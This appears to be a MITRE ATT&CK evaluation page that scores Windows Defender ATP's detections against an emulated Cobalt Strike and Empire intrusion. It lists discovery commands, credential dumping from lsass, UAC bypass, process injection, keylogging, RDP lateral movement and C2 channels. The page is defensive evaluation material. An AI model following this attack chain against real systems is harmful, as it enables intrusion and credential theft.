Home  >  Evaluations  >  Microsoft  >  Overview
Windows Defender ATP
Defender
Microsoft
Tags:    

Microsoft Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.
Vendor Configuration JSON     Legend
Legend
Main Detection Categories: Detection Modifiers:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment

Tainted

Delayed

Configuration Change
Step
Procedures
Technique
Detection Type Detection Notes
Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
Telemetry
  
Telemetry showed the user execution sequence of Resume Viewer.exe with multiple files written and subsequently executed. Resume Viewer.exe was audited by Exploit Guard and the vendor stated that the audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode.
Telemetry showing execution of Resume Viewer.exe from explorer.exe and dropping pdfhelper.cmd and autoupdate.bat
Telemetry showing write of pdfhelper.cmd
Telemetry showing write of autoupdate.bat
Telemetry showing execution of pdfhelper.cmd and update.dat
Telemetry showing execution of decoy PDF by MicrosoftPdfReader.exe
Telemetry showing Resume Viewer.exe binary and process metadata
Telemetry showing Resume Viewer.exe binary reputation
Exploit Guard audit of Resume Viewer.exe
Rundll32
(T1085)
Telemetry
  
Telemetry showed the execution sequence for rundll32.exe running update.dat.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for a low-reputation DLL loaded by a signed executable due to rundll32.exe execution of update.dat.
Telemetry showing rundll32.exe process injection sequence
General Behavior alert on low-reputation DLL load by signed executable
Scripting
(T1064)
Telemetry
  
Telemetry within a process tree showed the child cmd.exe process running the script pdfhelper.cmd.
Telemetry within the process tree showing the child cmd.exe process running the script pdfhelper.cmd
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed the execution sequence for Resume Viewer.exe writing autoupdate.bat to Debbie\'s Startup folder to establish persistence.
Telemetry showing write of autoupdate.bat to startup folder
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
None
  
No detection capability demonstrated for this procedure. DNS requests were observed (no detection showed port 53 specifically).
Telemetry showing DNS requests to the C2 domain (custom query) (does not count as a detection)
Data Encoding
(T1132)
None
  
No detection capability demonstrated for this procedure.
Standard Application Layer Protocol
(T1071)
Telemetry (Configuration Change)
  
 
Telemetry from showed DNS requests to freegoogleadsenseinfo.com (C2 domain). The vendor stated that DNS telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events.
Telemetry showing DNS requests to the C2 domain (custom query)
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing ipconfig.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious.
Telemetry showing execution sequence for ipconfig.exe with command-line arguments
General Behavior alert on suspicious sequence of discovery techniques
Process tree view of General Behavior alert on suspicious sequence of discovery techniques
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing arp.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for arp.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing arp.exe
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing echo with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for echo with command-line arguments
Process tree view of suspicious sequence of exploration activities alert with tainted rundll32.exe child processes showing echo command
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing tasklist.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for tasklist.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing tasklist.exe
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing sc.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for sc.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing sc.exe
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of suspicious sequence of exploration activities alert with tainted rundll32.exe child processes showing net.exe with command-line arguments
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running systeminfo.exe.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for systeminfo.exe
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing systeminfo.exe
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of suspicious sequence of exploration activities alert with tainted rundll32.exe child processes showing net.exe with command-line arguments
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
Telemetry showing domain admins group discovery by Nimda at the domain controller
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe running net.exe with command-line arguments.
General Behavior (Delayed)
  
 
A delayed General Behavior alert occurred due to a sequence of exploration activities that was classified as suspicious.
Telemetry showing execution sequence for net.exe with command-line arguments
General Behavior alert on suspicious sequence of exploration activities
Process tree view of General Behavior alert on suspicious sequence of exploration activities showing net.exe with command-line arguments
Telemetry showing discovery of George permissions by Debbie from Nimda at the domain controller
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe running reg.exe with command-line arguments (tainted by the alert on suspicious sequence of exploration activities from child processes of rundll32.exe).
Telemetry showing execution sequence for reg.exe with command-line arguments
Process tree view of General Behavior alert on suspicious sequence of discovery techniques (showing tainted reg.exe query command)
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe executed with the seclogon command-line argument and a subsequent elevated powershell.exe process, indicating token manipulation (tainted by parent alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script).
Telemetry showing svchost.exe execution with seclogon command-line argument then subsequent powershell.exe
Alert for \'Suspicious PowerShell command-line\' showing tainted association via a process tree containing svchost.exe and elevated powershell.exe
Bypass User Account Control
(T1088)
Telemetry (Tainted)
  
 
Telemetry showed rundll32.exe as a medium integrity process as user Debbie and subsequent execution of powershell.exe as a high integrity process as SYSTEM as part of the UAC bypass (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script).
Telemetry showing rundll32.exe running as medium integrity as user Debbie
Telemetry showing powershell.exe running as high integrity as SYSTEM
Alert for \'Suspicious PowerShell command-line\' showing tainted association via a process tree containing svchost.exe and elevated powershell.exe
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Enrichment (Tainted)
  
 
The capability enriched data showing powershell.exe injecting into cmd.exe (tainted by alert on a suspicious PowerShell command-line generated for the svchost.exe invocation of powershell.exe with an encoded script).
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for process injection. Process Injection attempt was audited by Exploit Guard. Vendor states that the Exploit Guard audit events demonstrate that execution would have been prevented if Export Address Table (EAF) was enabled in blocking mode.
Enrichment of powershell.exe injecting into cmd.exe
Alert for \'Suspicious PowerShell command-line\' showing tainted association via a process tree containing svchost.exe and elevated powershell.exe (subsequent powershell.exe is the injecting process)
Specific Behavior alert showing powershell.exe process injection
Telemetry showing process injection activity audited by Exploit Guard
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific net.exe command not shown)
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing net.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe).
Telemetry showing execution sequence for net.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific net.exe command not shown)
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing netsh.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe).
Telemetry showing execution sequence for netsh.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific netsh.exe command not shown)
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of cmd.exe executing netstat.exe with command-line arguments (tainted by the alert on suspicious process injection alert association with rundll32.exe).
Telemetry showing execution sequence for netstat.exe with command-line arguments
Process tree view of prior suspicious process injection alert showing tainted powershell.exe child cmd.exe process performing this action (specific netstat.exe command not shown)
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
Enrichment (Tainted)
  
 
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated on credential memory access.
Enrichment showing Exploit Guard audit of svchost.exe extracting credentials from lsass.exe
Alert for suspicious process injection showing tainted association via a process tree containing svchost.exe (inner failure message in screenshot not relevant to tested functionality)
Specific Behavior alert description for sensitive credential memory read
Process tree for sensitive credential memory read alert
Process Injection
(T1055)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for process injection into lsass.exe.
Telemetry showing svchost.exe accessing and extracting credentials from lsass.exe
Alert on credential dump showing injecting svchost.exe process (process with syringe) that was used to access lsass.exe
Specific Behavior alert for process injection into lsass.exe (inner failure message in screenshot not relevant to tested functionality)
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
Enrichment (Tainted)
  
 
The capability enriched data showing a svchost.exe process opening lsass.exe with a description that it was accessing credentials (tainted by parent process injection event that occurred from svchost.exe). Exploit Guard audited the process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. Vendor stated that Credential Guard can also mitigate this attack if enabled.
Enrichment showing Exploit Guard audit of svchost.exe extracting credentials from lsass.exe
Alert for process injection into lsass.exe tainting this event (inner failure message in screenshot not relevant to tested functionality)
Process Injection
(T1055)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe accessing lsass.exe and dumping credentials (tainted by parent alert on sensitive credential memory read for the first credential dump). Exploit Guard audited process open and credential extraction event. Vendor stated the Exploit Guard audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for process injection into lsass.exe. The alert was rolled up under the prior lsass.exe process injection alert and the last activity seen field was updated.
Telemetry showing svchost.exe accessing and extracting credentials from lsass.exe
Alert on prior credential dump tainting svchost.exe process (process with syringe indicating process injection) that was used to access lsass.exe
Specific Behavior alert for process injection into lsass.exe (inner failure message in screenshot not relevant to tested functionality)
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry (Tainted)
  
 
Telemetry showed svchost.exe as a high integrity process from SYSTEM and subsequent cmd.exe process running as user George (tainted by the parent alert on suspicious process injection into lsass.exe). Svchost.exe was executed with seclogon command-line argument indicating token manipulation.
Telemetry showing svchost.exe invocation with seclogon flag subsequently running cmd.exe as SYSTEM
Telemetry showing resulting cmd.exe running as user George
Alert for suspicious process injection showing tainted association via a process tree containing subsequent cmd.exe processes (inner failure message in screenshot not relevant to tested functionality)
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence of reg.exe executing with command-line arguments. The telemetry was tainted by the relationship to prior rundll32.exe activity based on process injection alert context.
Telemetry showing execution sequence for reg.exe with command-line arguments
Process tree view of suspicious process injection alert on lsass.exe showing tainted relationship to reg.exe (inner failure message in screenshot not relevant to tested functionality)
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for rundll32.exe opening a connection to 192.186.0.4 (C2 server) over port 80. The telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe.
Telemetry showing execution sequence for rundll32.exe opening network connection
Incident graph from "Unexpected process behavior" alert (resulting from rundll32.exe) showing tainted network connection
Multiband Communication
(T1026)
Telemetry (Tainted)
  
 
Telemetry showed an execution sequence for rundll32.exe opening a connection to 192.168.0.4 (C2 server) over port 80, and prior activity showed DNS traffic to the same C2 IP address, which could indicate multiband communication. The port 80 telemetry was tainted by the relationship to the previous alert on unexpected behavior originating from rundll32.exe. 
Telemetry showing execution sequence for rundll32.exe opening port 80 network connection
Incident graph from "Unexpected process behavior" alert (resulting from rundll32.exe) showing tainted network connection
Telemetry showing DNS traffic to C2 domain
Standard Application Layer Protocol
(T1071)
None
  
No detection capability demonstrated for this procedure, though telemetry showed a connection to port 80 (no detection showed HTTP specifically).
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed the execution sequence for cmd.exe establishing an outbound RDP connection over port 3389 to 10.0.0.5 (Conficker). Logon activity over the last 30 days on Conficker shows George with a logon type 10 RemoteInteractive logon event. Telemetry also showed George logged into Conficker and displayed a movement graph of activity from user account Debbie to George.
Telemetry showing execution sequence for cmd.exe connection over RDP to 10.0.0.5 (Conficker)
Telemetry showing execution sequence on 10.0.0.5 (Conficker) showing George logon
Telemetry showing user logon activity on 10.0.0.5 (Conficker) showing George with a logon type 10 RemoteInteractive logon event
Graph showing movement from Debbie account to George
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry (Configuration Change)
  
 
Telemetry showed data for account Jesse creation after configuration change to enable collection of event ID 4720. Visibility of account creation data was verified in retesting at the end of the evaluation after vendor adjusted data collection configuration and visibility of account creation.
Telemetry showing creation of user account Jesse
Graphical user Interface
(T1061)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing mmc.exe running lusrmgr.msc
Account Discovery
(T1087)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in) which displays local account information.
Telemetry showing mmc.exe running lusrmgr.msc
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Telemetry
  
Telemetry showed cmd.exe writing updater.dll to disk.
Telemetry showing file write of updater.dll
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed cmd.exe registering the "Resume Viewer Update Checker" scheduled task.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated on a low-reputation DLL persisting through a scheduled task.
Telemetry showing schtasks.exe with command-line arguments scheduling a task for persistence
Alert for low-reputation DLL persisting through rundll32.exe as a scheduled task
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for cmd.exe executing dir with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments.
Telemetry showing execution sequence of cmd.exe executing dir with command-line arguments
Process tree view of rundll32.exe "Unexpected behavior from process run with no command-line arguments" alert that tainted dir (dir command not shown)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for cmd.exe executing tree.com with command-line arguments. The telemetry was tainted by a prior alert on rundll32.exe being executed without command-line arguments.
Telemetry showing execution sequence of cmd.exe executing tree.com with command-line arguments
Process tree view of rundll32.exe "Unexpected behavior from process run with no command-line arguments" alert that tainted tree (tree command not shown)
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
Telemetry (Configuration Change)
  
 
Telemetry showed events indicating "explorer.exe is reading user keystrokes." The vendor stated that Input Capture telemetry is captured but it was not immediately visible in the user portal. The vendor made changes to the portal during the test to enable the visibility of these events. Telemetry also showed cmd.exe injecting into explorer.exe to facilitate the keylogging, but this did not identify input capture specifically so was not counted as a detection.
Specific Behavior (Delayed)
  
 
A delayed Specific Behavior alert was generated on "Possible keylogging activity" against explorer.exe.
Telemetry showing explorer.exe reading user keystrokes
Execution sequence showing cmd.exe injecting into explorer.exe (does not count as a detection)
Specific Behavior alert for "Possible keylogging activity" against explorer.exe
Application Window Discovery
(T1010)
None
  
No detection capability demonstrated for this procedure.
8.D.1
Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
Enrichment (Configuration Change)
  
 
The capability enriched an explorer.exe process with ScreenshotTaken. The vendor stated that screen capture telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events, so this detection is identified as a configuration change.
Enrichment of explorer.exe with ScreenshotTaken
Process Injection
(T1055)
Enrichment
  
The capability enriched the execution sequence for cmd.exe injecting into explorer.exe with the label "Inject to process."
Enrichment of execution sequence showing cmd.exe injecting into explorer.exe (labeled "Inject to process")
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
9.B.1
Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure. The vendor stated that by default WDATP monitored activities around all the most used documents (doc, xls, ppt pdf, etc) at the time of the evaluation. Subsequently, the vendor made changes to enable the visibility of .vsdx events by default, which is now available in WDATP.
Exfiltration Over Command and Control Channel
(T1041)
None
  
No detection capability demonstrated for this procedure.
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed the execution sequence of cmd.exe executing autoupdate.bat from the Startup folder to start update.dat.
Telemetry showing Startup folder execution sequence for autoupdate.bat on user logon
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry
  
Telemetry showed the execution sequence for rundll32.exe executing updater.dll with a parent of svchost.exe running with command-line arguments "-k netsvcs -p -s Schedule".
Telemetry showing execution sequence for svchost.exe parent of rundll32.exe process running with "-k netsvcs -p -s Schedule" arguments
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Remote Desktop Protocol
(T1076)
Telemetry
  
Telemetry showed a successful connection to Conficker (10.0.0.5) over port 3389 from rundll32.exe.
Telemetry showing successful port 3389 connection to Conficker (10.0.0.5)
Valid Accounts
(T1078)
Telemetry
  
Telemetry showed the new local user account Jesse logging into Conficker.
Telemetry showing local user account Jesse first and last seen logons on Conficker
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Telemetry
  
Telemetry showed explorer.exe running autoupdate.vbs through wscript.exe and subsequent execution of PowerShell script and cmdlets.
Specific Behavior
  
A delayed Specific Behavior alert was generated for suspicious PowerShell command-line arguments.
Specific Behavior (Delayed)
  
 
A Specific Behavior alert was generated for PowerShell script with suspicious content detected through Antimalware Scan Interface extracted content.
Specific Behavior
  
A Specific Behavior alert was generated for PowerShell script with malicious cmdlets related to Empire.
Telemetry showing execution of autoupdate.vbs script
Telemetry showing execution of wscript.exe
Telemetry showing execution of PowerShell cmdlets from wscript.exe
Telemetry showing PowerShell script metadata and decoded command-line arguments
Specific Behavior alert for "Suspicious PowerShell command-line"
Specific Behavior alert for "PowerShell script with suspicious content" detected through Antimalware Scan Interface extracted content
Specific Behavior alert for PowerShell script with malicious cmdlets
Process tree of alert showing containing malicious PowerShell cmdlets related to Empire
11.B.1
Empire: C2 channel established
Commonly Used Port
(T1043)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over port 443 (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert also showed decoded command-line arguments containing port 443.
Telemetry showing powershell.exe communicating over TCP port 443
Telemetry showing powershell.exe communicating to 192.168.0.5 (C2 server)
Telemetry within alert showing decoded command-line arguments containing port 443 and tainted relationship to the powershell.exe process
Standard Application Layer Protocol
(T1071)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform HTTPS connection to C2 domain.
Indicator of Compromise (Configuration Change)
  
 
An Indicator of Compromise alert was generated on the C2 domain. Vendor added detection for evaluation C2 domain using the standard customer-facing custom detection capabilities of the product.
Telemetry showing powershell.exe communicating to 192.168.0.5 (C2 server) over an encrypted channel
Telemetry within alert showing decoded command-line arguments containing HTTPS
Alert for C2 domain indicator of compromise 
Standard Cryptographic Protocol
(T1032)
Telemetry (Tainted)
  
 
Telemetry showed powershell.exe checking an SSL certificate and then communicating to 192.168.0.5 (C2 server) over an encrypted channel (tainted by relationship to alert on PowerShell script with suspicious content). Telemetry within an alert showed decoded command-line arguments to perform HTTPS connection to C2 domain.
Telemetry showing powershell.exe communicating to 192.168.0.5 (C2 server) over an encrypted channel
Telemetry within alert showing decoded command-line arguments containing HTTPS
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing route.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing route.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.A.2
Empire: 'ipconfig /all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing ipconfig.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.B.1
Empire: 'whoami /all /fo list' via PowerShell
System Owner/User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing whoami.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing whoami.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing qprocess.exe with command-line arguments. The telemetry was tainted by previous "Suspicious sequence of exploration activities" and suspicious PowerShell cmdlet alerts.
Telemetry showing execution sequence of powershell.exe executing qprocess.exe with command-line arguments
Process tree view of "Suspicious sequence of exploration activities" alert showing tainted powershell.exe process
Process tree view of powershell.exe with malicious cmdlets alert showing tainted powershell.exe process
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a previous suspicious PowerShell cmdlet alert.
General Behavior (Delayed)
  
 
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps.
Telemetry showing execution sequence of powershell.exe executing net.exe with command-line arguments
Process tree view of PowerShell script with malicious cmdlets alert showing tainted powershell.exe process
General Behavior alert description for "Suspicious sequence of discovery activities"
Process tree view of "Suspicious sequence of discovery activities" alert context with net.exe command-line arguments
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Telemetry (Tainted)
  
 
Telemetry showed the execution sequence from PowerShell with several activities from the WinEnum cmdlet. The telemetry was tainted by the previous "Suspicious sequence of exploration activities" alert.
Specific Behavior
  
A Specific Behavior alert was generated for "A malicious PowerShell Cmdlet was invoked on the machine."
